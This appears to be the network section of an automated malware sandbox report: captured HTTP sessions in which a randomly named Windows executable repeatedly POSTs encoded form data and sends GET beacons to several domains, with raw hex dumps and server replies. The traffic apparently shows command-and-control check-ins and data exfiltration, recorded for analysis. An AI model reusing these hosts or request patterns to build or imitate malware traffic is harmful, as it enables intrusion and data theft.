                                                                                                                                  Oct 22, 2024 22:57:29.764935017 CEST488OUTGET /bd77/?Sx=gnM4ZH&DrelH=qUcYNRi6MmsiGKriyom62ti4lIWHctjIcWj4n4RDTJ9SK0tIDWNU+4/fdEnUeQPlIjs5HOj1IjY+OoVWBoHCyUpz7x/SzvZhSZv0Dea0KcHBDKlEtGKZJ6Ek0LYLRuKiHQ== HTTP/1.1
                                                                                                                                  Host: www.launchdreamidea.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Oct 22, 2024 22:57:30.666951895 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:30 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0LxblphZLuKi7yr2hFSUhe7l7SdJ%2FUHaXwBjvNWaEte2dfIR6%2Fh%2BopK35eJXtGXtjK%2B4n0zr1wG7uKPVBaYfkmVuVexf7xqxLiEA6XBO6K1xtLtQX%2F%2FeJJAdE2C7wEszlOXGhsPl8s6rxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8d6c666c7a660b76-DFW
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1304&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=488&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                  Data Raw: 32 33 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 [TRUNCATED]
                                                                                                                                  Data Ascii: 234<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding
                                                                                                                                  Oct 22, 2024 22:57:30.667082071 CEST126INData Raw: 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45
                                                                                                                                  Data Ascii: to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  13192.168.2.5532163.33.130.190801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:57:35.726953983 CEST771OUTPOST /t10u/ HTTP/1.1
                                                                                                                                  Host: www.mondayigboleague.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.mondayigboleague.info
                                                                                                                                  Referer: http://www.mondayigboleague.info/t10u/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 2b 30 4d 75 48 50 43 4e 70 6d 30 61 46 2b 2f 74 68 52 53 49 33 4b 66 65 63 67 48 2b 37 76 41 52 73 74 58 6d 6a 62 39 59 43 56 41 6f 4c 32 32 55 42 57 53 37 76 4e 67 67 50 75 79 6b 34 55 64 79 4f 50 7a 6d 75 77 57 37 4c 54 2b 79 44 39 51 47 6a 67 6e 79 74 67 4a 5a 42 55 54 6e 4e 61 45 33 65 32 34 54 59 70 4c 58 41 65 79 6c 76 52 67 49 4c 4d 66 6c 68 4e 4a 42 6e 76 63 46 54 59 7a 2f 77 79 59 4e 78 59 70 76 4a 6b 4a 73 7a 41 58 52 62 48 7a 58 70 6b 6e 43 71 34 4b 76 2f 6c 6b 49 4e 2b 78 63 2b 64 59 4e 5a 64 4a 4d 32 35 33 49 4d 76 4d 55 53 65 6b 77 68 2f 30 73 58 50 54 65 36 77 79 34 6c 63 6b 3d
                                                                                                                                  Data Ascii: DrelH=+0MuHPCNpm0aF+/thRSI3KfecgH+7vARstXmjb9YCVAoL22UBWS7vNggPuyk4UdyOPzmuwW7LT+yD9QGjgnytgJZBUTnNaE3e24TYpLXAeylvRgILMflhNJBnvcFTYz/wyYNxYpvJkJszAXRbHzXpknCq4Kv/lkIN+xc+dYNZdJM253IMvMUSekwh/0sXPTe6wy4lck=


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  14192.168.2.5532173.33.130.190801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:57:38.265424013 CEST791OUTPOST /t10u/ HTTP/1.1
                                                                                                                                  Host: www.mondayigboleague.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.mondayigboleague.info
                                                                                                                                  Referer: http://www.mondayigboleague.info/t10u/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 2b 30 4d 75 48 50 43 4e 70 6d 30 61 45 66 50 74 6e 79 71 49 67 36 65 73 5a 67 48 2b 78 50 41 56 73 74 4c 6d 6a 5a 51 44 43 6a 77 6f 4c 58 47 55 47 53 47 37 73 4e 67 67 42 4f 79 74 32 30 64 37 4f 50 2f 75 75 78 71 37 4c 51 43 79 44 39 41 47 6a 53 50 78 73 77 4a 58 4e 30 54 6c 4a 61 45 33 65 32 34 54 59 70 66 39 41 65 71 6c 75 68 51 49 4b 70 72 6d 76 74 4a 43 77 66 63 46 58 59 7a 7a 77 79 59 6a 78 61 64 46 4a 6e 68 73 7a 42 6e 52 62 53 66 55 6e 6b 6e 41 6b 59 4c 46 36 6c 6c 65 58 6f 31 54 69 61 70 33 46 73 42 4c 36 76 61 69 57 4e 45 38 42 2b 49 49 78 73 38 62 47 2f 79 33 67 54 69 49 37 4c 77 42 30 37 6f 44 73 6e 34 37 72 38 43 35 2b 77 65 59 5a 63 6d 78
                                                                                                                                  Data Ascii: DrelH=+0MuHPCNpm0aEfPtnyqIg6esZgH+xPAVstLmjZQDCjwoLXGUGSG7sNggBOyt20d7OP/uuxq7LQCyD9AGjSPxswJXN0TlJaE3e24TYpf9AeqluhQIKprmvtJCwfcFXYzzwyYjxadFJnhszBnRbSfUnknAkYLF6lleXo1Tiap3FsBL6vaiWNE8B+IIxs8bG/y3gTiI7LwB07oDsn47r8C5+weYZcmx


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  15192.168.2.5532183.33.130.190801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:57:40.811918020 CEST1808OUTPOST /t10u/ HTTP/1.1
                                                                                                                                  Host: www.mondayigboleague.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.mondayigboleague.info
                                                                                                                                  Referer: http://www.mondayigboleague.info/t10u/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 2b 30 4d 75 48 50 43 4e 70 6d 30 61 45 66 50 74 6e 79 71 49 67 36 65 73 5a 67 48 2b 78 50 41 56 73 74 4c 6d 6a 5a 51 44 43 67 51 6f 4c 6c 4f 55 47 77 75 37 74 4e 67 67 4a 75 79 6f 32 30 63 37 4f 50 6e 71 75 78 6e 4d 4c 56 47 79 46 66 34 47 72 44 50 78 6e 77 4a 58 46 55 54 67 4e 61 46 31 65 79 56 62 59 70 50 39 41 65 71 6c 75 69 49 49 63 4d 66 6d 74 74 4a 42 6e 76 63 4a 54 59 7a 66 77 79 67 56 78 5a 78 2f 49 57 42 73 39 42 33 52 5a 6b 72 55 76 6b 6e 47 70 34 4c 64 36 6c 6f 41 58 6f 42 70 69 66 56 4e 46 72 46 4c 2f 62 71 2f 45 66 59 55 66 74 73 43 33 63 41 73 65 72 71 30 76 7a 61 30 36 62 67 55 32 6f 31 76 6e 67 51 62 39 64 48 6c 6d 55 69 4e 52 73 58 71 47 2b 34 50 34 44 73 4d 4c 5a 4c 57 73 57 50 55 53 73 65 4c 42 2f 2b 44 79 44 33 47 76 63 45 57 32 62 76 79 4b 54 56 33 4a 61 41 6f 4c 6f 77 78 63 65 7a 41 78 4d 68 69 49 5a 33 48 58 69 79 35 4f 34 4c 4f 4e 64 45 42 70 62 73 56 43 79 65 72 36 73 31 76 4c 4d 67 43 71 37 37 4c 46 70 73 64 46 6d 55 4c 4b 34 31 72 38 6e 4b 53 73 39 57 50 [TRUNCATED]
                                                                                                                                  Data Ascii: DrelH=+0MuHPCNpm0aEfPtnyqIg6esZgH+xPAVstLmjZQDCgQoLlOUGwu7tNggJuyo20c7OPnquxnMLVGyFf4GrDPxnwJXFUTgNaF1eyVbYpP9AeqluiIIcMfmttJBnvcJTYzfwygVxZx/IWBs9B3RZkrUvknGp4Ld6loAXoBpifVNFrFL/bq/EfYUftsC3cAserq0vza06bgU2o1vngQb9dHlmUiNRsXqG+4P4DsMLZLWsWPUSseLB/+DyD3GvcEW2bvyKTV3JaAoLowxcezAxMhiIZ3HXiy5O4LONdEBpbsVCyer6s1vLMgCq77LFpsdFmULK41r8nKSs9WPJ3EFUMvyui0GUqxh3fiqZ3ZsDG6QapI0FDfxWhHvIPyaxRwf5cEeDCtFq7TCKjOoKk5cBcYqvQ9n5c3NNR4dXkEBuXImkCebxfLdZVsnxjblLftd+QLWyLJUCyvPJBt1aZ2+gHeJQF7Uqw8sMmP8gdCGzlNdtLnBKk49UaMfobUzpPE3+BbSV0aequSa1wE1kXlwXCpiJP4cPCpk7k0xrf9Lk5xrhU4Tn0ZRKXQ6y8p5+kBZZMCdzBHiMsQ/Edn6/2R9dwKb43ttxqe8KLGB79emiLirF/M84D1Td5EcFMlv6YV4T5EyMNwKp2CXF/cRja4ntRasW7IIyiEyTnAkaKIBmp4JdhlWsdWq5QGIkWgixVoibaAxOvoi6jvEy4Fk3h/5AD6A/Nj2EOJb14GwvFUFUZosa7J09RBkKxRZVM37r+LlwfYBcYbu/IJDSx78AWXhFKB53Q4A3k1ECAHjlkn1Av9SrdXAfjFp3+SBhXawuR1kJ2XSJhnQqORf6SmSiabpyWoVT5dZDJvZSM24CRHt5Kh0wucK+VfcgTIi9vqMAGT8XpwZ2y1QNh8co0TEqig/ebctf0OQQtiWn1aNGn2xt7Omxc0I2+MA/CZyocfzg4ESjQeyIiQgKIs/0N6CUJDr3xS7Cjf+CHbWp7gtx3AOSMFN9/1YVM [TRUNCATED]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  16192.168.2.5532193.33.130.190801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:57:43.357148886 CEST490OUTGET /t10u/?DrelH=z2kOE6Hdw1U1MLXnqmWT9va9e3/8+PVtvvr0x5hWEi4SF2SHBGm8gNhzQPXfz38/DYz+lgbjU03/S4gao0rDqDpJDn/FJZpyPS5de5f3CrWN+zQkLsrau7VMl+ksG9OKqA==&Sx=gnM4ZH HTTP/1.1
                                                                                                                                  Host: www.mondayigboleague.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Oct 22, 2024 22:57:44.021413088 CEST403INHTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:43 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 263
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 72 65 6c 48 3d 7a 32 6b 4f 45 36 48 64 77 31 55 31 4d 4c 58 6e 71 6d 57 54 39 76 61 39 65 33 2f 38 2b 50 56 74 76 76 72 30 78 35 68 57 45 69 34 53 46 32 53 48 42 47 6d 38 67 4e 68 7a 51 50 58 66 7a 33 38 2f 44 59 7a 2b 6c 67 62 6a 55 30 33 2f 53 34 67 61 6f 30 72 44 71 44 70 4a 44 6e 2f 46 4a 5a 70 79 50 53 35 64 65 35 66 33 43 72 57 4e 2b 7a 51 6b 4c 73 72 61 75 37 56 4d 6c 2b 6b 73 47 39 4f 4b 71 41 3d 3d 26 53 78 3d 67 6e 4d 34 5a 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?DrelH=z2kOE6Hdw1U1MLXnqmWT9va9e3/8+PVtvvr0x5hWEi4SF2SHBGm8gNhzQPXfz38/DYz+lgbjU03/S4gao0rDqDpJDn/FJZpyPS5de5f3CrWN+zQkLsrau7VMl+ksG9OKqA==&Sx=gnM4ZH"}</script></head></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  17192.168.2.553220217.70.184.50801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:57:49.161356926 CEST741OUTPOST /0bvj/ HTTP/1.1
                                                                                                                                  Host: www.stocksm.fun
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.stocksm.fun
                                                                                                                                  Referer: http://www.stocksm.fun/0bvj/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 45 71 39 57 37 57 73 4e 62 69 68 70 32 43 35 52 37 41 76 5a 32 31 51 42 52 5a 44 71 57 4e 59 4e 38 62 39 62 75 2b 44 4d 4a 36 30 2f 64 44 4e 71 50 75 4b 59 7a 4c 77 2b 73 4e 39 59 4c 42 73 4f 37 2f 64 57 31 69 74 36 36 69 48 65 61 53 44 73 4a 61 2f 67 67 2b 32 51 2f 65 55 6a 56 76 51 71 31 6f 43 54 31 39 49 6a 44 39 70 66 41 34 73 48 43 5a 46 32 67 2b 75 77 73 48 31 73 38 54 78 4a 59 38 6a 39 35 56 72 33 34 4a 57 79 47 43 69 49 6e 6f 68 31 2b 6d 72 54 31 30 45 63 63 6f 35 6f 4d 52 37 5a 4f 32 4d 42 38 54 6f 6b 76 53 66 68 6e 34 72 41 66 50 65 6e 38 39 41 69 6a 70 44 57 37 35 34 71 4f 4a 4d 3d
                                                                                                                                  Data Ascii: DrelH=Eq9W7WsNbihp2C5R7AvZ21QBRZDqWNYN8b9bu+DMJ60/dDNqPuKYzLw+sN9YLBsO7/dW1it66iHeaSDsJa/gg+2Q/eUjVvQq1oCT19IjD9pfA4sHCZF2g+uwsH1s8TxJY8j95Vr34JWyGCiInoh1+mrT10Ecco5oMR7ZO2MB8TokvSfhn4rAfPen89AijpDW754qOJM=
                                                                                                                                  Oct 22, 2024 22:57:49.973726034 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:49 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  18192.168.2.553221217.70.184.50801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:57:51.703383923 CEST761OUTPOST /0bvj/ HTTP/1.1
                                                                                                                                  Host: www.stocksm.fun
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.stocksm.fun
                                                                                                                                  Referer: http://www.stocksm.fun/0bvj/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 45 71 39 57 37 57 73 4e 62 69 68 70 33 69 70 52 35 6a 58 5a 30 56 51 4f 65 35 44 71 63 74 59 42 38 62 78 62 75 38 76 6c 4a 49 67 2f 59 52 56 71 4d 73 69 59 77 4c 77 2b 30 64 39 64 57 78 73 2f 37 2f 51 72 31 67 70 36 36 69 37 65 61 54 7a 73 4a 73 33 6e 67 75 32 53 71 4f 55 68 4c 66 51 71 31 6f 43 54 31 38 34 4a 44 39 78 66 44 49 77 48 44 38 70 78 71 65 75 76 6d 6e 31 73 34 54 77 4f 59 38 6a 50 35 55 32 71 34 4c 75 79 47 44 53 49 6b 36 5a 30 30 6d 71 35 6f 45 46 78 59 64 55 48 57 43 6e 78 49 77 51 42 73 43 45 64 71 6b 79 4c 39 61 6a 6f 4d 76 79 66 73 75 49 56 79 5a 69 2f 68 61 6f 61 51 65 5a 73 6a 63 72 32 4c 6f 62 2b 78 44 59 51 6c 2b 66 47 43 42 7a 55
                                                                                                                                  Data Ascii: DrelH=Eq9W7WsNbihp3ipR5jXZ0VQOe5DqctYB8bxbu8vlJIg/YRVqMsiYwLw+0d9dWxs/7/Qr1gp66i7eaTzsJs3ngu2SqOUhLfQq1oCT184JD9xfDIwHD8pxqeuvmn1s4TwOY8jP5U2q4LuyGDSIk6Z00mq5oEFxYdUHWCnxIwQBsCEdqkyL9ajoMvyfsuIVyZi/haoaQeZsjcr2Lob+xDYQl+fGCBzU
                                                                                                                                  Oct 22, 2024 22:57:52.517530918 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:52 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  19192.168.2.553222217.70.184.50801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:57:54.254333019 CEST1778OUTPOST /0bvj/ HTTP/1.1
                                                                                                                                  Host: www.stocksm.fun
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.stocksm.fun
                                                                                                                                  Referer: http://www.stocksm.fun/0bvj/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
